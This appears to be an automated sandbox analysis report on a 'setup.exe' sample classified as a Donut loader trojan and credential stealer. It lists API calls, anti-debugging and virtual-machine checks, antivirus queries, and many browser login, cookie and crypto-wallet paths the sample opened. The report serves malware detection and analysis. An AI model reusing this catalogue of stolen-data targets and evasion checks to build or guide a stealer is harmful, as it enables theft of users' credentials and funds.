              Source: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C277AA __EH_prolog3_GS,GetCurrentProcess,OpenProcessToken,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryW,GetProcAddress,FreeLibrary,FreeLibrary,GetLastError, 0_2_00C277AA
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01020A85 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle, 0_2_01020A85
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C209D3 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00C209D3
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C380C4 FindResourceW,LoadResource,LockResource, 0_2_00C380C4
              Source: C:\Users\user\Desktop\setup.exe | Mutant created: NULL
              Source: setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: setup.exe, 00000000.00000003.1901013030.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914260349.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: setup.exe | ReversingLabs: Detection: 13%
              Source: setup.exe | Virustotal: Detection: 10%
              Source: C:\Users\user\Desktop\setup.exe | File read: C:\Users\user\Desktop\setup.exe
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: acgenral.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: samcli.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: msacm32.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: netapi32.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: dbghelp.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: dbgcore.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\setup.exe | Section loaded: profapi.dll
              Source: setup.exe | Static file information: File size 74715544 > 1048576
              Source: setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: setup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\MultiCommander\BuildOutput\Output\Win32\Release v143\MultiUpdate\MultiUpdate.pdb source: setup.exe
              Source: setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: setup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C24DE6 __EH_prolog3,GetObjectW,GetObjectW,GetObjectW,LoadLibraryW,GetProcAddress, 0_2_00C24DE6
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323D0 push ds; ret 0_2_00C323D9
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323DB push ds; ret 0_2_00C323DD
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323DF push ds; ret 0_2_00C323E1
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323E3 push ds; ret 0_2_00C323E5
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323E7 push ds; ret 0_2_00C323E9
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323EB push ds; ret 0_2_00C323ED
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323EF push ds; ret 0_2_00C323F1
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323F3 push ds; ret 0_2_00C323F5
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323F7 push ds; ret 0_2_00C323F9
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323FB push ds; ret 0_2_00C323FD
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C323FF push ds; ret 0_2_00C32401
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C32393 push ds; ret 0_2_00C32395
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C32353 push ds; ret 0_2_00C3235D
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C32367 push ds; ret 0_2_00C32369
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C32448 push ds; ret 0_2_00C32449
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C3244C push ds; ret 0_2_00C3244D
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C32453 push ds; ret 0_2_00C32455
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C32403 push ds; ret 0_2_00C32405
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C475AA push ecx; ret 0_2_00C475BD
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01063BA2 push eax; mov dword ptr [esp], 565150A3h 0_2_01063BA6
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C1C1D3 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon, 0_2_00C1C1D3
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C32917 IsIconic, 0_2_00C32917
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C01314 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00C01314
              Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\setup.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\setup.exe | API coverage: 3.1 %
              Source: C:\Users\user\Desktop\setup.exe TID: 7660 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C8805D FindFirstFileExW, 0_2_00C8805D
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C2C2ED GetFileAttributesW,FindFirstFileExW,GetLastError,FindFirstFileExW,FindFirstFileExW,GetLastError,FindClose,GetFileAttributesW,GetLastError,FindFirstFileExW,FindNextFileW, 0_2_00C2C2ED
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C3C97F SetLastError,FindFirstFileW,GetLastError, 0_2_00C3C97F
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C3CAC7 GetModuleHandleW,GetProcAddress,FindFirstFileW, 0_2_00C3CAC7
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C40F9D __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 0_2_00C40F9D
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C1F238 lstrcpyW,GetSystemInfo,VirtualQuery, 0_2_00C1F238
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141673952.000000000122D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2593341348.000000000122B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141521913.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2592829563.000000000121F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\setup.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_03040BE0 LdrInitializeThunk, 0_2_03040BE0
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C480CA IsDebuggerPresent,OutputDebugStringW, 0_2_00C480CA
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C2CC10 OutputDebugStringA,GetLastError, 0_2_00C2CC10
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C24DE6 __EH_prolog3,GetObjectW,GetObjectW,GetObjectW,LoadLibraryW,GetProcAddress, 0_2_00C24DE6
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01020375 mov edx, dword ptr fs:[00000030h] 0_2_01020375
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01020935 mov eax, dword ptr fs:[00000030h] 0_2_01020935
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01020CE5 mov eax, dword ptr fs:[00000030h] 0_2_01020CE5
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01020F84 mov eax, dword ptr fs:[00000030h] 0_2_01020F84
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01020F85 mov eax, dword ptr fs:[00000030h] 0_2_01020F85
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C87E72 GetProcessHeap, 0_2_00C87E72
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C71173 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C71173
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C47295 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00C47295
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C47B31 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C47B31
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C47CBD SetUnhandledExceptionFilter, 0_2_00C47CBD
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C19C19 __EH_prolog3_GS,#17,GetCurrentDirectoryW,ReleaseMutex,CloseHandle,GetModuleFileNameW,ReleaseMutex,CloseHandle,CreateMutexW,GetLastError,ReleaseMutex,Sleep,GetFileAttributesW,SetUnhandledExceptionFilter,GetDesktopWindow, 0_2_00C19C19

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\setup.exe | Code function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW, 0_2_00C4077C
              Source: C:\Users\user\Desktop\setup.exe | Code function: __EH_prolog3,LoadIconW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00C1ACBD
              Source: C:\Users\user\Desktop\setup.exe | Code function: lstrcpyW,GetSystemTimeAsFileTime,GetModuleFileNameW,lstrcpyW,lstrcpyW,GetUserNameW,lstrcpyW,GetSystemInfo,GetUserDefaultUILanguage,GetLocaleInfoW,lstrcpyW,GlobalMemoryStatus, 0_2_00C1F31B
              Source: C:\Users\user\Desktop\setup.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C789DE GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_00C789DE
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C1F31B lstrcpyW,GetSystemTimeAsFileTime,GetModuleFileNameW,lstrcpyW,lstrcpyW,GetUserNameW,lstrcpyW,GetSystemInfo,GetUserDefaultUILanguage,GetLocaleInfoW,lstrcpyW,GlobalMemoryStatus, 0_2_00C1F31B
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C87910 GetTimeZoneInformation, 0_2_00C87910
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C38F65 __EH_prolog3_GS,GetCurrentThread,GetCurrentThreadId,GetVersionExW, 0_2_00C38F65
              Source: C:\Users\user\Desktop\setup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: setup.exe, 00000000.00000003.1962331921.0000000003BDE000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.000000000129E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match, File source: Process Memory Space: setup.exe PID: 7468, type: MEMORYSTR
              Source: Yara match, File source: sslproxydump.pcap, type: PCAP
              Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Wallets/Electrum-LTC
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Wallets/ElectronCash
              Source: setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Jaxx Libertyn.2
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: window-state.json
              Source: setup.exe, 00000000.00000003.1942277987.000000000123E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: setup.exe, 00000000.00000003.1942277987.0000000001284000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Wallets/Exodus
              Source: setup.exe, 00000000.00000003.1962349277.000000000122A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: %appdata%\Ethereum
              Source: setup.exe, 00000000.00000003.1942277987.0000000001284000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: setup.exe, 00000000.00000003.1942277987.0000000001284000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: keystore
              Source: Signature Results, Signatures: Mutex created, HTTP post and idle behavior
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
